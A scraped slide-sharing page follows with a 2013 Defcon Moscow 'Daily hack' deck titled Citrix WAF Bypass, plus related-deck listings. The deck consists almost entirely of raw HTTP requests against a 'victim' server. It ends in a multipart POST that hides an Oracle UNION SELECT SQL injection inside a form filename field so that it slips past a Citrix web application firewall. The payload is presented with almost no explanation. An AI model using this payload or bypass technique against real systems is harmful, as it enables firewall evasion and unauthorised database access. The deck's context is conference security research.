Daily hack
By DCM
Jun 30, 2013
/whoami
Defcon Moscow
 You already know it about us
 ???
 PROFIT
Daily hack
Citrix WAF Bypass
GET /vulnerable_script HTTP/1.1
Host: victim
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0)
Gecko/20100101 Firefox/21.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ... citrix_ns_id_ ...
Connection: keep-alive
Daily hack
POST /vulnerable_script HTTP/1.1
Host: victim
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0)
Gecko/20100101 Firefox/21.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ... citrix_ns_id_ ...
Connection: keep-alive
Content-Length: 462
Citrix WAF Bypass
Daily hack
POST /vulnerable_script HTTP/1.1
Host: victim
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0)
Gecko/20100101 Firefox/21.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ... citrix_ns_id_ ...
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------2125014176
Content-Length: 462
Citrix WAF Bypass
Daily hack
Citrix WAF Bypass
----------2125014176
Content-Disposition: form-data; name="vid"
/***/
----------2125014176
Content-Disposition: form-data; name="vid"; filename="999999' union
select
'aaaaa',SYS.DATABASE_NAME,'bbbb',NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,null,NULL from dual -- "
1
----------2125014176--
http://bit.ly/1448cRr
Daily hack
The end.

More Related Content

TXT
Change log
ODP
A brief history of Linux Containers
PPTX
Brief history of Linux containers
PPTX
Installation of windows 7 || how to boot pendrive or cd/dvd
PDF
Unicorn: The Ultimate CPU Emulator by Akshay Ajayan
PDF
Containers from scratch
PDF
using Virtualbox NAT and shared folder
Change log
A brief history of Linux Containers
Brief history of Linux containers
Installation of windows 7 || how to boot pendrive or cd/dvd
Unicorn: The Ultimate CPU Emulator by Akshay Ajayan
Containers from scratch
using Virtualbox NAT and shared folder

What's hot (18)

PPTX
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
PPTX
Building a Cyber Range - Kevin Cardwell
PPTX
Windows 7 installation ppt
ODP
How to access your FIWARE Lab Instance.
PPTX
Windows XP Professional Installation
PDF
Require js + backbone, bower and grunt
PDF
containers-intro
PPTX
ODP
Design Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
PDF
EuroBSDCon 2021 - (auto)Installing BSD Systems
PDF
FreeBSD hosting
PPT
[HackInTheBox] Breaking virtualization by any means
PDF
Hacking the Linux Kernel - An Introduction
PPTX
Redis fundamental
PDF
CodePackager - Pack and Unpack repositories to mobile storage
DOCX
Linux Tor Browser kurulum
PDF
Xavier NXのカーネルとVMの話
DRAFT Internet and world wide web protocol ; pu t ty ; telnet ; wireshark
Building a Cyber Range - Kevin Cardwell
Windows 7 installation ppt
How to access your FIWARE Lab Instance.
Windows XP Professional Installation
Require js + backbone, bower and grunt
containers-intro
Design Summit - Smart State Analysis, aka VM Fleecing - Rich Oliveri
EuroBSDCon 2021 - (auto)Installing BSD Systems
FreeBSD hosting
[HackInTheBox] Breaking virtualization by any means
Hacking the Linux Kernel - An Introduction
Redis fundamental
CodePackager - Pack and Unpack repositories to mobile storage
Linux Tor Browser kurulum
Xavier NXのカーネルとVMの話

Viewers also liked (12)

PPTX
Hacking Citrix Cloud Server
PDF
Got citrix hack it
PDF
In house penetration testing pci dss
PDF
[2014/10/06] HITCON Freetalk - App Security on Android
PPTX
Android pen test basics
PDF
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
PPTX
Home Arcade setup (NoVA Hackers)
PPTX
[Wroclaw #1] Android Security Workshop
PDF
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
PDF
Android Security & Penetration Testing
PPTX
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
PDF
Penetration Testing for Android Smartphones
Hacking Citrix Cloud Server
Got citrix hack it
In house penetration testing pci dss
[2014/10/06] HITCON Freetalk - App Security on Android
Android pen test basics
Android Security Development - Part 2: Malicious Android App Dynamic Analyzi...
Home Arcade setup (NoVA Hackers)
[Wroclaw #1] Android Security Workshop
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Android Security & Penetration Testing
How to hack Citrix (So, You Just Inherited Someone Else's Citrix Environment....
Penetration Testing for Android Smartphones

More from defconmoscow (20)

PDF
7.5. Pwnie express IRL
PDF
7.4. Show impact [bug bounties]
PDF
7.3. iCloud keychain-2
PDF
7.2. Alternative sharepoint hacking
PDF
7.1. SDLC try me to implenment
PDF
6.4. PHD IV CTF final
PDF
6.3. How to get out of an inprivacy jail
PDF
6.2. Hacking most popular websites
PDF
6.1. iCloud keychain and iOS 7 data protection
PDF
6. [Bonus] DCM MI6
PDF
5.3. Undercover communications
PDF
5.2. Digital forensics
PDF
5.1. Flashback [hacking AD]
PDF
5. [Daily hack] Truecrypt
PDF
4.5. Contests [extras]
PDF
4.4. Hashcracking server on generic hardware
PDF
4.3. Rat races conditions
PDF
4.2. Web analyst fiddler
PDF
4.1. Path traversal post_exploitation
PDF
3.3. Database honeypot
7.5. Pwnie express IRL
7.4. Show impact [bug bounties]
7.3. iCloud keychain-2
7.2. Alternative sharepoint hacking
7.1. SDLC try me to implenment
6.4. PHD IV CTF final
6.3. How to get out of an inprivacy jail
6.2. Hacking most popular websites
6.1. iCloud keychain and iOS 7 data protection
6. [Bonus] DCM MI6
5.3. Undercover communications
5.2. Digital forensics
5.1. Flashback [hacking AD]
5. [Daily hack] Truecrypt
4.5. Contests [extras]
4.4. Hashcracking server on generic hardware
4.3. Rat races conditions
4.2. Web analyst fiddler
4.1. Path traversal post_exploitation
3.3. Database honeypot

Recently uploaded (20)

PPTX
Tìm hiểu về dịch vụ FTTH - Fiber Optic Access Node
PPTX
curriculumandpedagogyinearlychildhoodcurriculum-171021103104 - Copy.pptx
PPTX
在线订购名古屋艺术大学毕业证, buy NUA diploma学历认证失败怎么办
PDF
Alethe Consulting Corporate Profile and Solution Aproach
PPTX
Top Website Bugs That Hurt User Experience – And How Expert Web Design Fixes
PDF
Session 1 (Week 1)fghjmgfdsfgthyjkhfdsadfghjkhgfdsa
PDF
mera desh ae watn.(a source of motivation and patriotism to the youth of the ...
DOCX
Powerful Ways AIRCONNECT INFOSYSTEMS Pvt Ltd Enhances IT Infrastructure in In...
PDF
Containerization lab dddddddddddddddmanual.pdf
PDF
BIOCHEM CH2 OVERVIEW OF MICROBIOLOGY.pdf
PDF
SlidesGDGoCxRAIS about Google Dialogflow and NotebookLM.pdf
PPT
12 Things That Make People Trust a Website Instantly
PDF
Top 8 Trusted Sources to Buy Verified Cash App Accounts.pdf
PDF
Alethe Consulting Corporate Profile and Solution Aproach
PDF
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
PPT
250152213-Excitation-SystemWERRT (1).ppt
PPT
415456121-Jiwratrwecdtwfdsfwgdwedvwe dbwsdjsadca-EVN.ppt
PPTX
t_and_OpenAI_Combined_two_pressentations
PDF
simpleintnettestmetiaerl for the simple testint
PPTX
Viva Digitally Software-Defined Wide Area Network.pptx
Tìm hiểu về dịch vụ FTTH - Fiber Optic Access Node
curriculumandpedagogyinearlychildhoodcurriculum-171021103104 - Copy.pptx
在线订购名古屋艺术大学毕业证, buy NUA diploma学历认证失败怎么办
Alethe Consulting Corporate Profile and Solution Aproach
Top Website Bugs That Hurt User Experience – And How Expert Web Design Fixes
Session 1 (Week 1)fghjmgfdsfgthyjkhfdsadfghjkhgfdsa
mera desh ae watn.(a source of motivation and patriotism to the youth of the ...
Powerful Ways AIRCONNECT INFOSYSTEMS Pvt Ltd Enhances IT Infrastructure in In...
Containerization lab dddddddddddddddmanual.pdf
BIOCHEM CH2 OVERVIEW OF MICROBIOLOGY.pdf
SlidesGDGoCxRAIS about Google Dialogflow and NotebookLM.pdf
12 Things That Make People Trust a Website Instantly
Top 8 Trusted Sources to Buy Verified Cash App Accounts.pdf
Alethe Consulting Corporate Profile and Solution Aproach
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
250152213-Excitation-SystemWERRT (1).ppt
415456121-Jiwratrwecdtwfdsfwgdwedvwe dbwsdjsadca-EVN.ppt
t_and_OpenAI_Combined_two_pressentations
simpleintnettestmetiaerl for the simple testint
Viva Digitally Software-Defined Wide Area Network.pptx

2. [Daily hack] Citrix_waf_bypass

  • 2. /whoami Defcon Moscow  You already know it about us  ???  PROFIT
  • 3. Daily hack Citrix WAF Bypass GET /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive
  • 4. Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Length: 462 Citrix WAF Bypass
  • 5. Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Type: multipart/form-data; boundary=--------2125014176 Content-Length: 462 Citrix WAF Bypass
  • 6. Daily hack Citrix WAF Bypass ----------2125014176 Content-Disposition: form-data; name="vid" /***/ ----------2125014176 Content-Disposition: form-data; name="vid"; filename="999999' union select 'aaaaa',SYS.DATABASE_NAME,'bbbb',NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL,NULL,NULL,NULL,null,NULL from dual -- " 1 ----------2125014176-- http://bit.ly/1448cRr